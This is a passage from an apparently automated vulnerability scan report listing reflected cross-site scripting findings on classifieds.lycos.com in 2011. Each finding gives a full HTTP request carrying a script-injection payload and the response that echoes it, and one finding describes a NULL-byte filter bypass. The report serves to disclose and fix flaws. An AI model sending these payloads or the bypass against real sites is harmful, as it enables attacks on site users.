<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-foreclosure7dc5c"><script>alert(1)</script>96d5591b8e9/?mobile=1" rel="nofollow">
...[SNIP]...

1.56. http://classifieds.lycos.com/housing-sale-foreclosure/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-foreclosure/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 772a4"><script>alert(1)</script>0863b3ad0ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-foreclosure/?772a4"><script>alert(1)</script>0863b3ad0ec=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-foreclosure/?772a4"><script>alert(1)</script>0863b3ad0ec=1&mobile=1" rel="nofollow">
...[SNIP]...

1.57. http://classifieds.lycos.com/housing-sale-home/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-home/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd118"><script>alert(1)</script>76c0f84d788 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-homecd118"><script>alert(1)</script>76c0f84d788/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-homecd118"><script>alert(1)</script>76c0f84d788/?mobile=1" rel="nofollow">
...[SNIP]...

1.58. http://classifieds.lycos.com/housing-sale-home/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3e07"><script>alert(1)</script>bba54ed9fdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-home/?f3e07"><script>alert(1)</script>bba54ed9fdb=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:53 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-home/?f3e07"><script>alert(1)</script>bba54ed9fdb=1&mobile=1" rel="nofollow">
...[SNIP]...

1.59. http://classifieds.lycos.com/housing-sale-land/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-land/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1c48"><script>alert(1)</script>602a02817cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-landc1c48"><script>alert(1)</script>602a02817cf/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:38 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-landc1c48"><script>alert(1)</script>602a02817cf/?mobile=1" rel="nofollow">
...[SNIP]...

1.60. http://classifieds.lycos.com/housing-sale-land/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-land/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef73"><script>alert(1)</script>1760df3c467 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-land/?3ef73"><script>alert(1)</script>1760df3c467=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:15:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:02 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-land/?3ef73"><script>alert(1)</script>1760df3c467=1&mobile=1" rel="nofollow">
...[SNIP]...

1.61. http://classifieds.lycos.com/housing-sale-multi_family/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-multi_family/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84f1e"><script>alert(1)</script>ea2f165b766 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-multi_family84f1e"><script>alert(1)</script>ea2f165b766/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-multi_family84f1e"><script>alert(1)</script>ea2f165b766/?mobile=1" rel="nofollow">
...[SNIP]...

1.62. http://classifieds.lycos.com/housing-sale-multi_family/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-multi_family/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 657fc"><script>alert(1)</script>e72cbec7713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-multi_family/?657fc"><script>alert(1)</script>e72cbec7713=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:15:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:01 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-multi_family/?657fc"><script>alert(1)</script>e72cbec7713=1&mobile=1" rel="nofollow">
...[SNIP]...

1.63. http://classifieds.lycos.com/housing-sale-vacation/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-vacation/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81eda"><script>alert(1)</script>7114e62b448 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-vacation81eda"><script>alert(1)</script>7114e62b448/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:51:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:51:35 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-vacation81eda"><script>alert(1)</script>7114e62b448/?mobile=1" rel="nofollow">
...[SNIP]...

1.64. http://classifieds.lycos.com/housing-sale-vacation/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-vacation/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 430ae"><script>alert(1)</script>1f3a5663ade was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /housing-sale-vacation430ae"><script>alert(1)</script>1f3a5663ade/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:38 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-vacation430ae"><script>alert(1)</script>1f3a5663ade/?mobile=1" rel="nofollow">
...[SNIP]...

1.65. http://classifieds.lycos.com/housing-sale-vacation/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-vacation/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a23ee"><script>alert(1)</script>c8f63f04749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-vacation/?a23ee"><script>alert(1)</script>c8f63f04749=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-vacation/?a23ee"><script>alert(1)</script>c8f63f04749=1&mobile=1" rel="nofollow">
...[SNIP]...

1.66. http://classifieds.lycos.com/housing-sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 614c4"><script>alert(1)</script>eedf9505edd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale614c4"><script>alert(1)</script>eedf9505edd/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:22 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale614c4"><script>alert(1)</script>eedf9505edd/?mobile=1" rel="nofollow">
...[SNIP]...

1.67. http://classifieds.lycos.com/housing-sale/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6bb2"><script>alert(1)</script>fe77791765c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale/?c6bb2"><script>alert(1)</script>fe77791765c=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:37 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale/?c6bb2"><script>alert(1)</script>fe77791765c=1&mobile=1" rel="nofollow">
...[SNIP]...

1.68. http://classifieds.lycos.com/job-admin/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-admin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32400"><script>alert(1)</script>ad6e471f8c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-admin32400"><script>alert(1)</script>ad6e471f8c3/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:47 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-admin32400"><script>alert(1)</script>ad6e471f8c3/?mobile=1" rel="nofollow">
...[SNIP]...

1.69. http://classifieds.lycos.com/job-admin/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-admin/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5521"><script>alert(1)</script>af69a726549 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-admin/?a5521"><script>alert(1)</script>af69a726549=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:02 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 53726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-admin/?a5521"><script>alert(1)</script>af69a726549=1&mobile=1" rel="nofollow">
...[SNIP]...

1.70. http://classifieds.lycos.com/job-advertising/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-advertising/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e88"><script>alert(1)</script>8045ffbcb07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-advertisingc8e88"><script>alert(1)</script>8045ffbcb07/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:11:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-advertisingc8e88"><script>alert(1)</script>8045ffbcb07/?mobile=1" rel="nofollow">
...[SNIP]...

1.71. http://classifieds.lycos.com/job-advertising/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
